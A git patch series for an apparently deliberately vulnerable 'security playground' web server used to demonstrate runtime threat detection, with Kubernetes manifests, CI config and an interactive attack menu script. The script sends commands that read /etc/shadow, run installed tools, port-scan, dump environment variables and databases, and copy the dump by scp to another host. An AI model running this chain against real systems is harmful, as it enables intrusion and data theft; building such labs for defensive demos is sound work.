From 06194673269d7e6c8ee02b4d9ba76a95bc7907a5 Mon Sep 17 00:00:00 2001 From: Andrew D Date: Mon, 12 Dec 2022 18:04:12 +1100 Subject: [PATCH 01/21] Added K8s Deployment and interactive menu script --- .gitignore | 1 + Dockerfile | 10 +- Dockerfile.user | 13 +++ Makefile | 6 +- Pipfile | 13 --- Pipfile.lock | 98 ------------------- README.md | 34 ++++++- k8s-deployment-user-readonly.yaml | 69 +++++++++++++ k8s-deployment-user.yaml | 53 ++++++++++ k8s-deployment.yaml | 109 +++++++++++++++++++++ requirements.txt | 2 + sec-playground-menu.sh | 157 ++++++++++++++++++++++++++++++ 12 files changed, 440 insertions(+), 125 deletions(-) create mode 100644 .gitignore create mode 100644 Dockerfile.user delete mode 100644 Pipfile delete mode 100644 Pipfile.lock create mode 100644 k8s-deployment-user-readonly.yaml create mode 100644 k8s-deployment-user.yaml create mode 100644 k8s-deployment.yaml create mode 100644 requirements.txt create mode 100755 sec-playground-menu.sh diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..3fb5ab6 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +scan-logs diff --git a/Dockerfile b/Dockerfile index f22fb41..a0e77b9 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,14 +1,10 @@ -FROM python:3.7-buster - -RUN pip install pipenv==2018.11.26 +FROM python:3.9-alpine WORKDIR /app -COPY Pipfile /app -COPY Pipfile.lock /app -RUN pipenv install --system --deploy +COPY requirements.txt app.py /app/ -COPY app.py /app +RUN pip3 install -r requirements.txt EXPOSE 8080 diff --git a/Dockerfile.user b/Dockerfile.user new file mode 100644 index 0000000..769ce9f --- /dev/null +++ b/Dockerfile.user @@ -0,0 +1,13 @@ +FROM python:3.9-alpine + +WORKDIR /app + +COPY requirements.txt app.py /app/ + +RUN pip3 install -r requirements.txt + +EXPOSE 8080 + +USER nobody + +CMD ["gunicorn", "-b", ":8080", "--workers", "2", "--threads", "4", "--worker-class", "gthread", "--access-logfile", "-", "--error-logfile", "-", "app:app"] diff --git a/Makefile b/Makefile index 01c2ee0..13f02cc 100644 --- a/Makefile +++ b/Makefile @@ -1,7 +1,9 @@ docker: build push build: - docker build -t sysdiglabs/security-playground . + docker build -t fernii/security-playground:2.0-root -f Dockerfile . + docker build -t fernii/security-playground:2.0-user -f Dockerfile.user . push: - docker push sysdiglabs/security-playground + docker push fernii/security-playground:2.0-root + docker push fernii/security-playground:2.0-user diff --git a/Pipfile b/Pipfile deleted file mode 100644 index 83e97c2..0000000 --- a/Pipfile +++ /dev/null @@ -1,13 +0,0 @@ -[[source]] -url = "https://pypi.python.org/simple" -verify_ssl = true -name = "pypi" - -[packages] -flask = "*" -gunicorn = "*" - -[dev-packages] - -[requires] -python_version = "3.7" diff --git a/Pipfile.lock b/Pipfile.lock deleted file mode 100644 index 8a08f73..0000000 --- a/Pipfile.lock +++ /dev/null @@ -1,98 +0,0 @@ -{ - "_meta": { - "hash": { - "sha256": "e46a466983138988510a5e8eaae4bdd72c687253099085758aee9f5936d977f2" - }, - "pipfile-spec": 6, - "requires": { - "python_version": "3.7" - }, - "sources": [ - { - "name": "pypi", - "url": "https://pypi.python.org/simple", - "verify_ssl": true - } - ] - }, - "default": { - "click": { - "hashes": [ - "sha256:2335065e6395b9e67ca716de5f7526736bfa6ceead690adf616d925bdc622b13", - "sha256:5b94b49521f6456670fdb30cd82a4eca9412788a93fa6dd6df72c94d5a8ff2d7" - ], - "version": "==7.0" - }, - "flask": { - "hashes": [ - "sha256:13f9f196f330c7c2c5d7a5cf91af894110ca0215ac051b5844701f2bfd934d52", - "sha256:45eb5a6fd193d6cf7e0cf5d8a5b31f83d5faae0293695626f539a823e93b13f6" - ], - "index": "pypi", - "version": "==1.1.1" - }, - "gunicorn": { - "hashes": [ - "sha256:aa8e0b40b4157b36a5df5e599f45c9c76d6af43845ba3b3b0efe2c70473c2471", - "sha256:fa2662097c66f920f53f70621c6c58ca4a3c4d3434205e608e121b5b3b71f4f3" - ], - "index": "pypi", - "version": "==19.9.0" - }, - "itsdangerous": { - "hashes": [ - "sha256:321b033d07f2a4136d3ec762eac9f16a10ccd60f53c0c91af90217ace7ba1f19", - "sha256:b12271b2047cb23eeb98c8b5622e2e5c5e9abd9784a153e9d8ef9cb4dd09d749" - ], - "version": "==1.1.0" - }, - "jinja2": { - "hashes": [ - "sha256:74320bb91f31270f9551d46522e33af46a80c3d619f4a4bf42b3164d30b5911f", - "sha256:9fe95f19286cfefaa917656583d020be14e7859c6b0252588391e47db34527de" - ], - "version": "==2.10.3" - }, - "markupsafe": { - "hashes": [ - "sha256:00bc623926325b26bb9605ae9eae8a215691f33cae5df11ca5424f06f2d1f473", - "sha256:09027a7803a62ca78792ad89403b1b7a73a01c8cb65909cd876f7fcebd79b161", - "sha256:09c4b7f37d6c648cb13f9230d847adf22f8171b1ccc4d5682398e77f40309235", - "sha256:1027c282dad077d0bae18be6794e6b6b8c91d58ed8a8d89a89d59693b9131db5", - "sha256:24982cc2533820871eba85ba648cd53d8623687ff11cbb805be4ff7b4c971aff", - "sha256:29872e92839765e546828bb7754a68c418d927cd064fd4708fab9fe9c8bb116b", - "sha256:43a55c2930bbc139570ac2452adf3d70cdbb3cfe5912c71cdce1c2c6bbd9c5d1", - "sha256:46c99d2de99945ec5cb54f23c8cd5689f6d7177305ebff350a58ce5f8de1669e", - "sha256:500d4957e52ddc3351cabf489e79c91c17f6e0899158447047588650b5e69183", - "sha256:535f6fc4d397c1563d08b88e485c3496cf5784e927af890fb3c3aac7f933ec66", - "sha256:62fe6c95e3ec8a7fad637b7f3d372c15ec1caa01ab47926cfdf7a75b40e0eac1", - "sha256:6dd73240d2af64df90aa7c4e7481e23825ea70af4b4922f8ede5b9e35f78a3b1", - "sha256:717ba8fe3ae9cc0006d7c451f0bb265ee07739daf76355d06366154ee68d221e", - "sha256:79855e1c5b8da654cf486b830bd42c06e8780cea587384cf6545b7d9ac013a0b", - "sha256:7c1699dfe0cf8ff607dbdcc1e9b9af1755371f92a68f706051cc8c37d447c905", - "sha256:88e5fcfb52ee7b911e8bb6d6aa2fd21fbecc674eadd44118a9cc3863f938e735", - "sha256:8defac2f2ccd6805ebf65f5eeb132adcf2ab57aa11fdf4c0dd5169a004710e7d", - "sha256:98c7086708b163d425c67c7a91bad6e466bb99d797aa64f965e9d25c12111a5e", - "sha256:9add70b36c5666a2ed02b43b335fe19002ee5235efd4b8a89bfcf9005bebac0d", - "sha256:9bf40443012702a1d2070043cb6291650a0841ece432556f784f004937f0f32c", - "sha256:ade5e387d2ad0d7ebf59146cc00c8044acbd863725f887353a10df825fc8ae21", - "sha256:b00c1de48212e4cc9603895652c5c410df699856a2853135b3967591e4beebc2", - "sha256:b1282f8c00509d99fef04d8ba936b156d419be841854fe901d8ae224c59f0be5", - "sha256:b2051432115498d3562c084a49bba65d97cf251f5a331c64a12ee7e04dacc51b", - "sha256:ba59edeaa2fc6114428f1637ffff42da1e311e29382d81b339c1817d37ec93c6", - "sha256:c8716a48d94b06bb3b2524c2b77e055fb313aeb4ea620c8dd03a105574ba704f", - "sha256:cd5df75523866410809ca100dc9681e301e3c27567cf498077e8551b6d20e42f", - "sha256:e249096428b3ae81b08327a63a485ad0878de3fb939049038579ac0ef61e17e7" - ], - "version": "==1.1.1" - }, - "werkzeug": { - "hashes": [ - "sha256:7280924747b5733b246fe23972186c6b348f9ae29724135a6dfc1e53cea433e7", - "sha256:e5f4a1f98b52b18a93da705a7458e55afb26f32bff83ff5d19189f92462d65c4" - ], - "version": "==0.16.0" - } - }, - "develop": {} -} diff --git a/README.md b/README.md index f5a9919..2ef0fa6 100644 --- a/README.md +++ b/README.md @@ -1,14 +1,17 @@ # Security Playground -![last commit](https://flat.badgen.net/github/last-commit/sysdiglabs/security-playground?icon=github) ![licence](https://flat.badgen.net/github/license/sysdiglabs/security-playground) ![docker pulls](https://flat.badgen.net/docker/pulls/sysdiglabs/security-playground?icon=docker) - The security playground is a HTTP web server to simulate security breaches in run time. ## Installation -Use the docker image to deploy it in your Kubernetes cluster or locally in a -container. +Use the docker image to deploy it in your Kubernetes cluster + +```bash +$ kubectl apply -f k8s-deployment.yaml +``` + +Or run it locally in a using docker ```bash $ docker run --rm -p 8080:8080 sysdiglabs/security-playground @@ -16,7 +19,7 @@ $ docker run --rm -p 8080:8080 sysdiglabs/security-playground ## Usage -The HTTP API exposes tree endpoints to interact with the system. +The HTTP API exposes three endpoints to interact with the system. ### Reading a file @@ -47,3 +50,24 @@ $ curl -X POST /exec -d 'command=ls -la' ``` This will capture and return the STDOUT of the command executed. + +### Interactive Menu + +Or for some quick testing try the sec-playground-menu.sh bash script + +```bash +$ ./sec-playground-menu.sh +What is the http address of your target? [http://192.168.1.59]: + +Select an Exploit: +1) Read Sensitive File +2) Write script to /tmp +3) Exec bad script +4) Run Port Scan +5) Dump Environment Variables +6) Install PSQL Tools +7) Dump DB +8) Exfiltrate Data +0) Exit +Choose an option: +``` diff --git a/k8s-deployment-user-readonly.yaml b/k8s-deployment-user-readonly.yaml new file mode 100644 index 0000000..caa8a27 --- /dev/null +++ b/k8s-deployment-user-readonly.yaml @@ -0,0 +1,69 @@ +apiVersion: v1 +kind: Namespace +metadata: + name: secplay + +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: security-playground-user-readonlyfs + namespace: secplay + labels: + app: security-playground-readonlyfs +spec: + replicas: 1 + selector: + matchLabels: + app: security-playground-readonlyfs + template: + metadata: + labels: + app: security-playground-readonlyfs + spec: + affinity: + nodeAffinity: + requiredDuringSchedulingIgnoredDuringExecution: + nodeSelectorTerms: + - matchExpressions: + - key: kubernetes.io/arch + operator: In + values: + - amd64 + volumes: + - name: temp-volume + emptyDir: + sizeLimit: 50Mi + containers: + - name: security-playground-readonlyfs + image: fernii/security-playground:2.0-user + volumeMounts: + - mountPath: /usr/tmp + name: temp-volume + ports: + - containerPort: 8080 + securityContext: + runAsNonRoot: true + runAsUser: 65534 + capabilities: + drop: + - all + readOnlyRootFilesystem: true + +--- +apiVersion: v1 +kind: Service +metadata: + labels: + app: security-playground-readonlyfs + name: security-playground-readonlyfs-svc +spec: + ports: + - port: 80 + protocol: TCP + targetPort: 8080 + selector: + app: security-playground-readonlyfs + type: LoadBalancer + + diff --git a/k8s-deployment-user.yaml b/k8s-deployment-user.yaml new file mode 100644 index 0000000..d95716a --- /dev/null +++ b/k8s-deployment-user.yaml @@ -0,0 +1,53 @@ +apiVersion: v1 +kind: Namespace +metadata: + name: secplay + +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: security-playground-user + namespace: secplay + labels: + app: security-playground-user +spec: + replicas: 1 + selector: + matchLabels: + app: security-playground-user + template: + metadata: + labels: + app: security-playground-user + spec: + affinity: + nodeAffinity: + requiredDuringSchedulingIgnoredDuringExecution: + nodeSelectorTerms: + - matchExpressions: + - key: kubernetes.io/arch + operator: In + values: + - amd64 + containers: + - name: security-playground-user + image: fernii/security-playground:2.0-user + ports: + - containerPort: 8080 + +--- +apiVersion: v1 +kind: Service +metadata: + labels: + app: security-playground-user + name: security-playground-user-svc +spec: + ports: + - port: 80 + protocol: TCP + targetPort: 8080 + selector: + app: security-playground-user + type: LoadBalancer \ No newline at end of file diff --git a/k8s-deployment.yaml b/k8s-deployment.yaml new file mode 100644 index 0000000..56eec93 --- /dev/null +++ b/k8s-deployment.yaml @@ -0,0 +1,109 @@ +apiVersion: v1 +kind: Namespace +metadata: + name: secplay + +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: security-playground + namespace: secplay + labels: + app: security-playground +spec: + replicas: 1 + selector: + matchLabels: + app: security-playground + template: + metadata: + labels: + app: security-playground + spec: + affinity: + nodeAffinity: + requiredDuringSchedulingIgnoredDuringExecution: + nodeSelectorTerms: + - matchExpressions: + - key: kubernetes.io/arch + operator: In + values: + - amd64 + containers: + - name: security-playground + image: fernii/security-playground:2.0-root + env: + - name: PGHOST + value: "appdb" + - name: PGUSER + value: "postgres" + - name: PGPASSWORD + value: "postgres" + ports: + - containerPort: 8080 + +--- +apiVersion: v1 +kind: Service +metadata: + labels: + app: security-playground + name: secplay +spec: + ports: + - port: 80 + protocol: TCP + targetPort: 8080 + selector: + app: security-playground + type: LoadBalancer + +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: appdb + namespace: secplay + labels: + app: appdb +spec: + replicas: 1 + selector: + matchLabels: + app: appdb + template: + metadata: + labels: + app: appdb + spec: + affinity: + nodeAffinity: + requiredDuringSchedulingIgnoredDuringExecution: + nodeSelectorTerms: + - matchExpressions: + - key: kubernetes.io/arch + operator: In + values: + - amd64 + containers: + - name: appdb + image: aa8y/postgres-dataset:latest + ports: + - containerPort: 5432 + +--- +apiVersion: v1 +kind: Service +metadata: + labels: + app: appdb + name: appdb +spec: + ports: + - port: 5432 + protocol: TCP + targetPort: 5432 + selector: + app: appdb + type: ClusterIP \ No newline at end of file diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..f163f4d --- /dev/null +++ b/requirements.txt @@ -0,0 +1,2 @@ +flask +gunicorn \ No newline at end of file diff --git a/sec-playground-menu.sh b/sec-playground-menu.sh new file mode 100755 index 0000000..30d3934 --- /dev/null +++ b/sec-playground-menu.sh @@ -0,0 +1,157 @@ +#!/bin/bash + +read -p "What is the http address of your target? [http://192.168.1.59]: " sec_playground_url +sec_playground_url=${sec_playground_url:-http://192.168.1.59} + +function read_sensitive_file() { + echo "********************************************************************************" + echo "" + echo "Reading /etc/shadow from remote service... " + echo "The following curl command is about to be run, press any key to continue..." + echo "Command: curl ${sec_playground_url}/etc/shadow" + echo "" + echo "Press any key to continue..." + read + echo "--------------------------------------------------------------------------------" + curl ${sec_playground_url}/etc/shadow + echo "********************************************************************************" +} + +function upload_file() { + echo "********************************************************************************" + echo "" + echo "Uploading file to /tmp/ " + echo "The following curl command is about to be run, press any key to continue..." + echo "Command: curl -X POST ${sec_playground_url}/tmp/bad_script.sh -d 'content=apk add nmap openssh'" + echo "" + echo "Press any key to continue..." + read + echo "--------------------------------------------------------------------------------" + curl -X POST ${sec_playground_url}/tmp/bad_script.sh -d content="apk add nmap openssh" + echo "" + echo "********************************************************************************" +} + +function exec_bad_script() { + echo "********************************************************************************" + echo "Installing nmap and scp in remote contianer... " + echo "The following curl command is about to be run, press any key to continue..." + echo "Command: curl -X POST ${sec_playground_url}/exec -d 'command=sh /tmp/bad_script.sh'" + echo "" + echo "Press any key to continue..." + read + echo "--------------------------------------------------------------------------------" + curl -X POST ${sec_playground_url}/exec -d 'command=sh /tmp/bad_script.sh' + echo "********************************************************************************" +} + +function find_suid_binaries() { + echo "********************************************************************************" + echo "Find SUID Binaries... " + echo "The following curl command is about to be run, press any key to continue..." + echo "Command: curl -X POST ${sec_playground_url}/exec -d 'command=find / -perm -u=s -type f 2>/dev/null'" + echo "" + echo "Press any key to continue..." + read + echo "--------------------------------------------------------------------------------" + curl -X POST ${sec_playground_url}/exec -d 'command=find / -perm -u=s -type f 2>/dev/null' + echo "********************************************************************************" +} + + +function port_scan() { + echo "********************************************************************************" + echo "Run Port Scan... " + echo "The following curl command is about to be run:" + echo "Command: curl -X POST ${sec_playground_url}/exec -d 'command=nmap -Pn -p 5432 appdb'" + echo "" + echo "Press any key to continue..." + read + echo "--------------------------------------------------------------------------------" + curl -X POST ${sec_playground_url}/exec -d 'command=nmap -Pn -p 5432 appdb' + echo "********************************************************************************" +} + +function dump_env_var() { + echo "********************************************************************************" + echo "Dump Environment Variables... " + echo "The following curl command is about to be run, press any key to continue..." + echo "Command: curl -X POST ${sec_playground_url}/exec -d 'command=printenv'" + echo "" + echo "Press any key to continue..." + read + echo "--------------------------------------------------------------------------------" + curl -X POST ${sec_playground_url}/exec -d 'command=printenv' + echo "********************************************************************************" +} + +function install_psql_tools() { + echo "********************************************************************************" + echo "Install PSQL Tools... " + echo "The following curl command is about to be run, press any key to continue..." + echo "Command: curl -X POST ${sec_playground_url}/exec -d 'command=apk add postgresql-client'" + echo "" + echo "Press any key to continue..." + read + echo "--------------------------------------------------------------------------------" + curl -X POST ${sec_playground_url}/exec -d 'command=apk add postgresql-client' + echo "********************************************************************************" +} + +function dump_db() { + echo "********************************************************************************" + echo "Dump all Databases... " + echo "The following curl command is about to be run, press any key to continue..." + echo "Command: curl -X POST ${sec_playground_url}/exec -d 'command=pg_dumpall -f /tmp/db_dump.tar;ls -la /tmp/''" + echo "" + echo "Press any key to continue..." + read + echo "--------------------------------------------------------------------------------" + curl -X POST ${sec_playground_url}/exec -d 'command=pg_dumpall -f /tmp/db_dump.tar;ls -la /tmp/' + echo "********************************************************************************" +} + +function exfiltrate_data() { + echo "********************************************************************************" + echo "Exfiltrate Data... " + echo "The following curl command is about to be run, press any key to continue..." + echo "Command: curl -X POST ${sec_playground_url}/exec -d 'command=scp -r /tmp/db_dump.tar test@192.168.1.51:/tmp/db_dump.tar'" + echo "" + echo "Press any key to continue..." + read + echo "--------------------------------------------------------------------------------" + curl -X POST ${sec_playground_url}/exec -d 'command=scp -r /tmp/db_dump.tar test@192.168.1.51:/tmp/db_dump.tar' + echo "********************************************************************************" +} + + +menu(){ +echo -ne " +******************************************************************************** +Select an Exploit: +1) Read Sensitive File +2) Write script to /tmp +3) Exec bad script +4) Run Port Scan +5) Dump Environment Variables +6) Install PSQL Tools +7) Dump DB +8) Exfiltrate Data +0) Exit +Choose an option: " + read a + case $a in + 1) read_sensitive_file ; menu ;; + 2) upload_file ; menu ;; + 3) exec_bad_script ; menu ;; + 4) port_scan ; menu ;; + 5) dump_env_var ; menu ;; + 6) install_psql_tools ; menu ;; + 7) dump_db ; menu ;; + 8) exfiltrate_data ; menu ;; + 0) exit 0 ;; + esac +} + +# Call the menu function +menu \ No newline at end of file From 33b66874b8f74fad19eb8a56f62e930a7cc52dd0 Mon Sep 17 00:00:00 2001 From: Andrew D Date: Mon, 12 Dec 2022 18:17:03 +1100 Subject: [PATCH 02/21] Add some colour to the output --- sec-playground-menu.sh | 47 +++++++++++++++++++++++++++--------------- 1 file changed, 30 insertions(+), 17 deletions(-) diff --git a/sec-playground-menu.sh b/sec-playground-menu.sh index 30d3934..5ddac2a 100755 --- a/sec-playground-menu.sh +++ b/sec-playground-menu.sh @@ -3,8 +3,22 @@ read -p "What is the http address of your target? [http://192.168.1.59]: " sec_playground_url sec_playground_url=${sec_playground_url:-http://192.168.1.59} +printy() { + printf "\e[33;1m%s\n" "$1" +} +printg() { + printf "\e[32m$1\e[m\n" +} +printr() { + echo -e "\033[1;31m$1\033[0m" +} + +printb() { + echo -e "\033[0m" +} + function read_sensitive_file() { - echo "********************************************************************************" + printg "********************************************************************************" echo "" echo "Reading /etc/shadow from remote service... " echo "The following curl command is about to be run, press any key to continue..." @@ -14,11 +28,11 @@ function read_sensitive_file() { read echo "--------------------------------------------------------------------------------" curl ${sec_playground_url}/etc/shadow - echo "********************************************************************************" + printg "********************************************************************************" } function upload_file() { - echo "********************************************************************************" + printg "********************************************************************************" echo "" echo "Uploading file to /tmp/ " echo "The following curl command is about to be run, press any key to continue..." @@ -29,11 +43,11 @@ function upload_file() { echo "--------------------------------------------------------------------------------" curl -X POST ${sec_playground_url}/tmp/bad_script.sh -d content="apk add nmap openssh" echo "" - echo "********************************************************************************" + printg "********************************************************************************" } function exec_bad_script() { - echo "********************************************************************************" + printg "********************************************************************************" echo "Installing nmap and scp in remote contianer... " echo "The following curl command is about to be run, press any key to continue..." echo "Command: curl -X POST ${sec_playground_url}/exec -d 'command=sh /tmp/bad_script.sh'" @@ -42,11 +56,11 @@ function exec_bad_script() { read echo "--------------------------------------------------------------------------------" curl -X POST ${sec_playground_url}/exec -d 'command=sh /tmp/bad_script.sh' - echo "********************************************************************************" + printg "********************************************************************************" } function find_suid_binaries() { - echo "********************************************************************************" + printg "********************************************************************************" echo "Find SUID Binaries... " echo "The following curl command is about to be run, press any key to continue..." echo "Command: curl -X POST ${sec_playground_url}/exec -d 'command=find / -perm -u=s -type f 2>/dev/null'" @@ -55,12 +69,12 @@ function find_suid_binaries() { read echo "--------------------------------------------------------------------------------" curl -X POST ${sec_playground_url}/exec -d 'command=find / -perm -u=s -type f 2>/dev/null' - echo "********************************************************************************" + printg "********************************************************************************" } function port_scan() { - echo "********************************************************************************" + printg "********************************************************************************" echo "Run Port Scan... " echo "The following curl command is about to be run:" echo "Command: curl -X POST ${sec_playground_url}/exec -d 'command=nmap -Pn -p 5432 appdb'" @@ -69,11 +83,11 @@ function port_scan() { read echo "--------------------------------------------------------------------------------" curl -X POST ${sec_playground_url}/exec -d 'command=nmap -Pn -p 5432 appdb' - echo "********************************************************************************" + printg "********************************************************************************" } function dump_env_var() { - echo "********************************************************************************" + printg "********************************************************************************" echo "Dump Environment Variables... " echo "The following curl command is about to be run, press any key to continue..." echo "Command: curl -X POST ${sec_playground_url}/exec -d 'command=printenv'" @@ -82,7 +96,7 @@ function dump_env_var() { read echo "--------------------------------------------------------------------------------" curl -X POST ${sec_playground_url}/exec -d 'command=printenv' - echo "********************************************************************************" + printg "********************************************************************************" } function install_psql_tools() { @@ -99,7 +113,7 @@ function install_psql_tools() { } function dump_db() { - echo "********************************************************************************" + printg "********************************************************************************" echo "Dump all Databases... " echo "The following curl command is about to be run, press any key to continue..." echo "Command: curl -X POST ${sec_playground_url}/exec -d 'command=pg_dumpall -f /tmp/db_dump.tar;ls -la /tmp/''" @@ -108,11 +122,11 @@ function dump_db() { read echo "--------------------------------------------------------------------------------" curl -X POST ${sec_playground_url}/exec -d 'command=pg_dumpall -f /tmp/db_dump.tar;ls -la /tmp/' - echo "********************************************************************************" + printg "********************************************************************************" } function exfiltrate_data() { - echo "********************************************************************************" + printg "********************************************************************************" echo "Exfiltrate Data... " echo "The following curl command is about to be run, press any key to continue..." echo "Command: curl -X POST ${sec_playground_url}/exec -d 'command=scp -r /tmp/db_dump.tar test@192.168.1.51:/tmp/db_dump.tar'" @@ -121,13 +135,12 @@ function exfiltrate_data() { read echo "--------------------------------------------------------------------------------" curl -X POST ${sec_playground_url}/exec -d 'command=scp -r /tmp/db_dump.tar test@192.168.1.51:/tmp/db_dump.tar' - echo "********************************************************************************" + printg "********************************************************************************" } menu(){ echo -ne " -******************************************************************************** Select an Exploit: 1) Read Sensitive File 2) Write script to /tmp From 4fa9d436c9b72861e69c0d371f7a025a91143030 Mon Sep 17 00:00:00 2001 From: andrewd-sysdig <90011178+andrewd-sysdig@users.noreply.github.com> Date: Wed, 14 Dec 2022 20:43:08 +1100 Subject: [PATCH 03/21] Create k8s-lab1.yml --- k8s-lab1.yml | 101 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 101 insertions(+) create mode 100644 k8s-lab1.yml diff --git a/k8s-lab1.yml b/k8s-lab1.yml new file mode 100644 index 0000000..6185791 --- /dev/null +++ b/k8s-lab1.yml @@ -0,0 +1,101 @@ +apiVersion: apps/v1 +kind: Deployment +metadata: + name: security-playground + labels: + app: security-playground +spec: + replicas: 1 + selector: + matchLabels: + app: security-playground + template: + metadata: + labels: + app: security-playground + spec: + affinity: + nodeAffinity: + requiredDuringSchedulingIgnoredDuringExecution: + nodeSelectorTerms: + - matchExpressions: + - key: kubernetes.io/arch + operator: In + values: + - amd64 + containers: + - name: security-playground + image: fernii/security-playground:2.0-root + env: + - name: PGHOST + value: "appdb" + - name: PGUSER + value: "postgres" + - name: PGPASSWORD + value: "postgres" + ports: + - containerPort: 8080 + +--- +apiVersion: v1 +kind: Service +metadata: + labels: + app: security-playground + name: secplay +spec: + ports: + - port: 80 + protocol: TCP + targetPort: 8080 + selector: + app: security-playground + type: NodePort + +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: appdb + labels: + app: appdb +spec: + replicas: 1 + selector: + matchLabels: + app: appdb + template: + metadata: + labels: + app: appdb + spec: + affinity: + nodeAffinity: + requiredDuringSchedulingIgnoredDuringExecution: + nodeSelectorTerms: + - matchExpressions: + - key: kubernetes.io/arch + operator: In + values: + - amd64 + containers: + - name: appdb + image: aa8y/postgres-dataset:latest + ports: + - containerPort: 5432 + +--- +apiVersion: v1 +kind: Service +metadata: + labels: + app: appdb + name: appdb +spec: + ports: + - port: 5432 + protocol: TCP + targetPort: 5432 + selector: + app: appdb + type: ClusterIP From 11de66f679f7f6cbd31cd84010e69413420de2f5 Mon Sep 17 00:00:00 2001 From: andrewd-sysdig <90011178+andrewd-sysdig@users.noreply.github.com> Date: Wed, 14 Dec 2022 21:01:38 +1100 Subject: [PATCH 04/21] Update k8s-lab1.yml --- k8s-lab1.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/k8s-lab1.yml b/k8s-lab1.yml index 6185791..51f47ca 100644 --- a/k8s-lab1.yml +++ b/k8s-lab1.yml @@ -48,6 +48,7 @@ spec: - port: 80 protocol: TCP targetPort: 8080 + nodePort: 30000 selector: app: security-playground type: NodePort From a2f87e344dae0b6cad5a0b30f098697da2893f40 Mon Sep 17 00:00:00 2001 From: andrewd-sysdig <90011178+andrewd-sysdig@users.noreply.github.com> Date: Wed, 11 Jan 2023 20:42:18 +1100 Subject: [PATCH 05/21] Return stderr on exec --- app.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/app.py b/app.py index 9f1a6e4..5cac5f5 100644 --- a/app.py +++ b/app.py @@ -17,19 +17,19 @@ def write(file_to_write): content = request.values['content'] with open('/' + file_to_write, 'w') as f: f.write(content) - return content @app.route('/exec', methods=['POST']) def exec(): command = [request.values['command']] - - process = subprocess.run(command, shell=True, capture_output=True) - + process = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) return process.stdout @app.route('/health', methods=['GET']) def health(): return 'OK' + +if __name__ == "__main__": + app.run() From a827dcfc0aabbf862578d34e828079174319620f Mon Sep 17 00:00:00 2001 From: andrewd-sysdig <90011178+andrewd-sysdig@users.noreply.github.com> Date: Wed, 11 Jan 2023 20:44:22 +1100 Subject: [PATCH 06/21] Add docker image pipeline --- .github/workflows/docker-image.yml | 34 ++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 .github/workflows/docker-image.yml diff --git a/.github/workflows/docker-image.yml b/.github/workflows/docker-image.yml new file mode 100644 index 0000000..9cca0b3 --- /dev/null +++ b/.github/workflows/docker-image.yml @@ -0,0 +1,34 @@ +name: Docker Image CI + +on: + push: + branches: [ "master" ] + +env: + SYSDIG_URL: https://app.au1.sysdig.com + REGISTRY: ghcr.io + IMAGE_NAME: ${{ github.repository }} + BYPASS_SCAN_FAIL: true + +jobs: + build: + runs-on: ubuntu-latest + + steps: + - name: Checkout code + uses: actions/checkout@v3 + + - name: Build the Docker image + run: docker build . --file Dockerfile --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ github.run_number }} --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:latest + + - name: Sysdig Secure Inline Scan - New + run: | + curl -LO "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -L -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" + chmod +x ./sysdig-cli-scanner + SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} ./sysdig-cli-scanner --apiurl ${{env.SYSDIG_URL}} docker://${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ github.run_number }} || ${{ env.BYPASS_SCAN_FAIL }} + + - name: Log in to the Container registry + run: docker login -u ${{ github.actor }} -p ${{ secrets.GITHUB_TOKEN }} ${{ env.REGISTRY }} + + - name: Push the Docker image + run: docker push -a ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }} From 1f002f20f908d56f96f831abb5f5da467b636a90 Mon Sep 17 00:00:00 2001 From: Andrew D Date: Wed, 11 Jan 2023 20:54:49 +1100 Subject: [PATCH 07/21] Change to ghcr images --- .github/workflows/docker-image.yml | 7 +- Makefile | 9 --- k8s-deployment-user-readonly.yaml | 2 +- k8s-deployment-user.yaml | 2 +- k8s-deployment.yaml | 2 +- k8s-lab1.yml | 102 ----------------------------- sec-playground-menu.sh | 4 +- 7 files changed, 10 insertions(+), 118 deletions(-) delete mode 100644 Makefile delete mode 100644 k8s-lab1.yml diff --git a/.github/workflows/docker-image.yml b/.github/workflows/docker-image.yml index 9cca0b3..1c68b91 100644 --- a/.github/workflows/docker-image.yml +++ b/.github/workflows/docker-image.yml @@ -19,7 +19,9 @@ jobs: uses: actions/checkout@v3 - name: Build the Docker image - run: docker build . --file Dockerfile --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ github.run_number }} --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:latest + run: | + docker build . --file Dockerfile --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ github.run_number }} --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:latest + docker build . --file Dockerfile.user --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:user-${{ github.run_number }} --tag ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:user-latest - name: Sysdig Secure Inline Scan - New run: | @@ -31,4 +33,5 @@ jobs: run: docker login -u ${{ github.actor }} -p ${{ secrets.GITHUB_TOKEN }} ${{ env.REGISTRY }} - name: Push the Docker image - run: docker push -a ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }} + run: | + docker push -a ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }} diff --git a/Makefile b/Makefile deleted file mode 100644 index 13f02cc..0000000 --- a/Makefile +++ /dev/null @@ -1,9 +0,0 @@ -docker: build push - -build: - docker build -t fernii/security-playground:2.0-root -f Dockerfile . - docker build -t fernii/security-playground:2.0-user -f 